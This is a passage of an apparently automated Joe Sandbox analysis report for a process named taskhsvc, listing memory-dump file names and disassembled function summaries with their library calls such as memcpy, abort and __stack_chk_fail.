    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003172A4, Relevance: 3.0, APIs: 2, Instructions: 24
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00316B7E, Relevance: 3.0, APIs: 2, Instructions: 21
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002DE31B, Relevance: 1.6, APIs: 1, Instructions: 88
    APIs
      • Part of subcall function 0033434A: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DEE90), ref: 003343B0
      • Part of subcall function 0033434A: memcpy.MSVCRT ref: 00334405
      • Part of subcall function 0033434A: __stack_chk_fail.LIBSSP-0 ref: 00334423
    • __stack_chk_fail.LIBSSP-0 ref: 002DE499
      • Part of subcall function 00322664: abort.MSVCRT ref: 003226B4
      • Part of subcall function 00322664: __stack_chk_fail.LIBSSP-0 ref: 00322709
      • Part of subcall function 00334293: memcpy.MSVCRT ref: 003342DE
      • Part of subcall function 00334293: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00334338), ref: 003342F1
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002B2B73, Relevance: 1.6, APIs: 1, Instructions: 68
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 002B2C58
      • Part of subcall function 0031F06F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF47), ref: 0031F0A7
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F1F0
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F22F
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F26E
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F319
      • Part of subcall function 0031F194: __stack_chk_fail.LIBSSP-0 ref: 0031F3A5
      • Part of subcall function 0031F0AE: abort.MSVCRT ref: 0031F104
      • Part of subcall function 0031F0AE: abort.MSVCRT ref: 0031F143
      • Part of subcall function 0031F0AE: __stack_chk_fail.LIBSSP-0 ref: 0031F18D
      • Part of subcall function 002B3EC7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002B66C7), ref: 002B3EFF
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002BEE75, Relevance: 1.6, APIs: 1, Instructions: 67
    APIs
      • Part of subcall function 002BF2B8: memset.MSVCRT ref: 002BF3B3
      • Part of subcall function 002BF2B8: memset.MSVCRT ref: 002BF4BA
      • Part of subcall function 002BF2B8: __stack_chk_fail.LIBSSP-0(?), ref: 002BF590
      • Part of subcall function 002BEC89: __stack_chk_fail.LIBSSP-0 ref: 002BECC0
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C01E2), ref: 002BEF25
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002B354C, Relevance: 1.6, APIs: 1, Instructions: 66
    APIs
      • Part of subcall function 002C1E90: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00238007), ref: 002C1EC8
      • Part of subcall function 002B4093: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0026B89E), ref: 002B40C7
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002B3295), ref: 002B362A
      • Part of subcall function 002B40CE: abort.MSVCRT ref: 002B412D
      • Part of subcall function 002B40CE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,00000000,?,0026B8C3), ref: 002B416C
      • Part of subcall function 002B3023: abort.MSVCRT ref: 002B308D
      • Part of subcall function 002B3023: time.MSVCRT ref: 002B30F0
      • Part of subcall function 002B3023: __stack_chk_fail.LIBSSP-0 ref: 002B3141
      • Part of subcall function 002B33E8: abort.MSVCRT ref: 002B348F
      • Part of subcall function 002B33E8: __stack_chk_fail.LIBSSP-0 ref: 002B3545
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F19DE, Relevance: 1.6, APIs: 1, Instructions: 65
    APIs
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 001C27F9: abort.MSVCRT ref: 001C2849
      • Part of subcall function 001C27F9: event_del.LIBEVENT-2-0-5 ref: 001C28A9
      • Part of subcall function 001C27F9: __stack_chk_fail.LIBSSP-0 ref: 001C290A
      • Part of subcall function 0021329C: abort.MSVCRT ref: 00213305
      • Part of subcall function 0021329C: __stack_chk_fail.LIBSSP-0 ref: 0021359C
      • Part of subcall function 00212830: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 0021288C
      • Part of subcall function 00212830: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 00212932
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EA9F9
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA3B
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA7A
      • Part of subcall function 001EA98A: time.MSVCRT ref: 001EABA2
      • Part of subcall function 001EA98A: __stack_chk_fail.LIBSSP-0 ref: 001EABBD
    • __stack_chk_fail.LIBSSP-0 ref: 001F2115
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
